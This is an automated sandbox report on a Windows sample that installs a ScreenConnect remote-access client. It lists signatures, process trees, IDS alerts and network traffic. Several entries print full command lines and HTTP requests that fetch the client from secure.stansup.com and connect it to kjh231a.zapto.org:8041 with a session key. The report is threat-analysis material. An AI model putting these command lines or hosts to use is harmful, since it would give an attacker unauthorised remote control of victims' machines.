Windows Analysis Report
96r3GgxntQ.exe

Overview

General Information

Sample name: 96r3GgxntQ.exe (renamed because original name is a hash value)
Original sample name: a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f.exe
Analysis ID: 1542316
MD5: 1d59c17159ad086256e0c1c2c34666ae
SHA1: aaf33cf2f9e970a41535a556dc507e667288ac82
SHA256: a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f
Tags: exe, secure-stansup-com, user-JAMESWT_MHT

Detection

ScreenConnect Tool
Score: 66
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 20
Range: 0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Deletes keys which are related to windows safe boot (disables safe mode boot)
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • 96r3GgxntQ.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\96r3GgxntQ.exe" MD5: 1D59C17159AD086256E0C1C2C34666AE)
    • dfsvc.exe (PID: 7652 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 3708 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 5292 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 7860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7740 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7772 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8024 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 4460 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 7468 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 7652 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ScreenConnect.WindowsClient.exe.a0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection, Author: Nasreddine Bencherchali (Nextron Systems), Data: DestinationIp: 192.168.2.11, DestinationIsIpv6: false, DestinationPort: 49727, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7740, ProcessName: svchost.exe
                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-25T19:27:31.624141+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49784 | TCP
                  2024-10-25T19:27:33.427540+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49796 | TCP
                  2024-10-25T19:27:38.892228+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49834 | TCP
                  2024-10-25T19:27:40.793535+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49844 | TCP
                  2024-10-25T19:27:42.998964+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49859 | TCP
                  2024-10-25T19:27:47.138118+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49880 | TCP
                  2024-10-25T19:27:48.713242+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49891 | TCP
                  2024-10-25T19:27:52.315535+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.11 | 49910 | TCP


                  AV Detection

                  Source: 96r3GgxntQ.exe, ReversingLabs: Detection: 23%
                  Source: Submitted Sample, Integrated Neural Analysis Model: Matched 96.5% probability
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00BB1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe

                  Compliance

                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeUnpacked PE file: 11.2.ScreenConnect.ClientService.exe.5560000.0.unpack
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, EXE: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: 96r3GgxntQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 96r3GgxntQ.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49817 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49824 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49834 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.11:49891 version: TLS 1.2
                  Source: 96r3GgxntQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 96r3GgxntQ.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A06C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734370181.0000000005562000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1782306577.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.1784635687.000000001B880000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1730092141.00000000008AD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A21A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1752617572.000000001B372000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A21E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736567404.0000000002242000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A068000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1734596134.0000000005692000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB4A4B FindFirstFileExA,0_2_00BB4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe, File opened: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.11:49944 -> 79.110.49.185:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49796
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49784
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49891
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49834
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49880
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49844
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49910
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.11:49859
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: secure.stansup.com
                  Source: global trafficDNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srfP
                  Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1498219510.000001CEA36D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
